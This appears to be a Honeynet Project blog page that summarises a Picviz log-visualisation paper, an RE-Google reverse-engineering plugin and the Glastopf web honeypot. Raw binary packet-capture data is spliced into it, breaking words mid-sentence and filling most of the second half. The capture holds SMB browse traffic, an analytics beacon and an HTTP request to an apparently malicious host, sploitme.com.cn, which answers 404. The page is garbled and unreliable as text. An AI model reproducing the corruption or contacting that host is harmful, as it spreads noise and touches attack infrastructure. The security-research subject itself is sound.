    Picviz is a parallel coordinates plotter which enables easy scripting from various input (tcpdump, syslog, iptables logs, apache logs, etc..) to visualize data and discover interesting aspects of that data quickly. Picviz uncovers previously hidden data that is ;=Kj <<RT5'_E(@6L @r]P\h*bPn FHEPF;=KB '_RT5E@@r P]*b\hPdifficult to identify with traditional analysis methods.

    In the first paper of our new Know Your Tools series, Sebastien Tricaud from the French Honeynet Project Chapter and Victor Amaducci from the University of Campinas, focus on Picviz. After a brief overview on parallel coordinates, Picviz architecture, and installation procedure, three real-world examples are presented that illustrate how to identify attacks from large amounts of data: Picviz is used to analyze SSH logs, Apache access logs and network traffic. With these examples, it is demonstrated how Picviz can find attacks that previously have been hidden.


    Recent additions to Picviz GUI have been made by Victor Amaducci under the mentorship of Sebastien Tricaud as part of the Google Summer of Code program 2009. The most recent version of Picviz is freely available for download from its project site at http://www.wallinfire.net/picviz and support can be sought from the Picviz mailing list at http://www.wallinfire.net/cgi-bin/mailman/listinfo/picviz..

    RE-Google in action - screenshot

    Main blog - Sun, 11/15/2009 - 22:49

    RE-Google in action - screenshot

    Main blog - Sun, 11/15/2009 - 22:34

    RE-Google Architecture

    Main blog - Sun, 11/15/2009 - 22:31

    RE-Google - or how Grandma started Reverse Engineering

    Main blog - Sun, 11/15/2009 - 22:20
    Some people say "Reverse Engineering is an art". Well, this might be true if you consider stuff like mathematics as art. It is more an application of standard methods that evolve constantly. Actually, everybody can learn these methods and start to RE executables. With the RE-Google plugin for IDA Pro, even your granny can start reversing :)

    Glastopf

    Main blog - Sat, 10/17/2009 - 19:19
    Web sites are hacked all the time. Web application, database, and cross-site scripting vulnerabil;=K}<<RT5'_E(@6G @r]P\h;BP]) DIE;=K'_RT5E@@r P];B\hPities expose a large attack surface that can be exploited to, among others, deface the web site, send spam, convert web site into bots, and serve drive-by-download attacks. Glastopf is a low-interaction honeypot that emulates a vulnerable web server hosting many web pages and web applications with thousands of vulnerabilities. Glastopf is easy to setup and once indexed by search engines, attacks will pour in by the thousands daily. Glastopf has been developed as part of the 2009 Google of Summer Code by student Lukas Rist (and mentored by Thorsten Holz of the German Honeynet Project Chapter). It can be downloaded from the Glastopf trac site at http://trac.glastopf.org/trac. More information on Glastopf can be found on the project site at http://glastopf.org/.
    Syndicate content
    ;=K<<RT5'_E(@6D @r]P\hCPT DIEGE;=Kt;;'_RT5E-@9@r P]C\hP 0 ;=KW<<RT5'_E(@6C @r]P\hCPT FHEPF;=K66'_RT5E(@=@r P]C\hPO;=Ks66'_RT5E(@<@r P]C\hPO;=K <<RT5'_E(@6B @r]P\hCPT;=K(>>RT5'_E0@QC J}Mf^P$0p{;=Kԕ ::'_RT5E,@AJ}Mf P^$0`e;=Kv <<RT5'_E(@QI J}Mf^P$0P;=K? RT5'_E@N J}Mf^P$0P?GET /__utm.gif?utmwv=4.6.5&utmn=1298421081&utmhn=www.honeynet.org&utmcs=utf-8&utmsr=1088x729&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=6.0%20r79&utmdt=Honeynet%20Project%20Blog%20%7C%20The%20Honeynet%20Project&utmhid=2068504592&utmr=-&utmp=%2F&utmac=UA-372404-7&utmcc=__utma%3D121888786.1305690527.1264085162.1265310375.1265310467.7%3B%2B__utmz%3D121888786.1264085162.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B HTTP/1.1 Accept: */* Referer: http://www.honeynet.org/ Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.google-analytics.com Connection: Keep-Alive ;=Kʠ 66'_RT5E(@DJ}Mf P^$0Pz;=Ko <<RT5'_E(@QF J}MfXP>A_P DIE;=K#pp'_RT5Eb@ J}Mf P^$0PGHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:07:06 GMT Content-Length: 35 Pragma: no-cache Expires: Wed, 19 Apr 2000 11:43:45 GMT Last-Modified: Wed, 21 Jan 2004 19:50:30 GMT Content-Type: image/gif Server: Golfe Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate X-XSS-Protection: 0 ;=K0YY'_RT5EK@J}Mf P^<$0P=GIF89a,D;;=K3<<RT5'_E(@QD J}Mf^P$0_P DIE;=Kp66'_RT5E(@sH84 PZ{=ZPq;=KNs<<RT5'_E(@I 84ZPZ{=Pv;=K '_EP  `  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA ABACFPFPENFDECFCEPFHFDEFFPFPACABSMB%00VA\MAILSLOT\BROWSE `WORKGROUPXj 8FD12EDD2DC1462;=KI >>RT5'_E0@6/ @r_P֓p\;=K'O::'_RT5E,@2@r P_F֔`;=KU <<RT5'_E(@Q? J}Mf^P$0_Py;=K ::'_RT5E,@1@r P_F֔`;=K7VV'=UEH6DC4k-Z'=UcSc5t='=U 8fd12edd2dc1462<MSFT 5.07 ,./!+;=KNN'=URT5E@@Z  CD,`-Z  '=UcSc5  3Q6 ;=Ktpp'=UEb5DCN'-Z'=UcSc5='=U2 6  8fd12edd2dc1462Q8fd12edd2dc1462.<MSFT 5.07 ,./!+;=KNN'=URT5E@@Z  CD,Q-Z   '=UcSc5  3Q6 ;=K%'<<'=U'=U  ;=KS<<'=U'=U  -Z;=K![<<'=U'=U  -Z;=Knn'=UE`  Lf,g) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   ;=K<<^'=UF(2 ";=KRR'=URT5ED   F(2 ";=K) nn'=UE`  Lf,g) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   ;=K h<<^'=UF(2 " DIEGE;=KXiRR'=URT5ED   F(2 ";=KM nn'=UE`  Lf,g) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   ;=Ke<<'=U'=U  ;=K**'=URT5RT5 '=U ;=KZ>>RT5'=UE0@0 84oPEpp;=K::'=URT5E,@r84 PoE`R;=K<<RT5'=UE(@7 84oPEP;=K+RT5'=UE@ 84oPEPGET /fg/show.php HTTP/1.0 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 Accept: */* Host: sploitme.com.cn Connection: Keep-Alive ;=K66'=URT5E(@r84 PoEP^;=Ki'=URT5E@m784 PoEP*HTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:08:38 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Vary: Accept-Encoding Content-Length: 3500 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html 404 Not Found

    Not Found

    The requested URL /fg/show.php was not found on this server.

    ;=K<<RT5'=UE(@4 84oPE"P:;=KDwnn'=UE`  Lg,g( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   ;=Knn'=UE`  L)h) FHEPFCELEHFCEPFFFACACACACACACAAA   ;=KEnn'=UE`  L)h) FHEPFCELEHFCEPFFFACACACACACACAAA   ;=Kx nn'=UE`  L)h) FHEPFCELEHFCEPFFFACACACACACACAAA   ;=Knn'=UE`  L)h( FHEPFCELEHFCEPFFFACACACACACACAAA   ;=K_nn'=UE`  Lf(i) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   ;=Knn'=UE`  L&j) FHEPFCELEHFCEPFFFACACACACACACABO   ;=K|Xnn'=UE`  Lf(i) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   ;=Krznn'=UE`  L&j) FHEPFCELEHFCEPFFFACACACACACACABO   ;=K nn'=UE`  Lf(i) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   ;=K nn'=UE`  L&j) FHEPFCELEHFCEPFFFACACACACACACABO   ;=Knn'=UE`  Lg(i( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   ;=KSnn'=UE`  L&j( FHEPFCELEHFCEPFFFACACACACACACABO   ;=K$'=UEJ  rk  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=K)'=UE:  Cl  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA FHEPFCELEHFCEPFFFACACACACACACABNSMB%!!V2\MAILSLOT\BROWSE8FD12EDD2DC1462U;=KL '=UEG  rn  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=KR-'=UEF  ro  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462;=K, '=UEE  rp  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462<=K9'=UE8  +q  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE z8FD12EDD2DC1462<=K?'=UE7  +r  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE z8FD12EDD2DC1462<=Kn'=UE6  +s  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE z8FD12EDD2DC1462<=KS'=UE5  +t  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABOSMB%V/\MAILSLOT\BROWSE z8FD12EDD2DC1462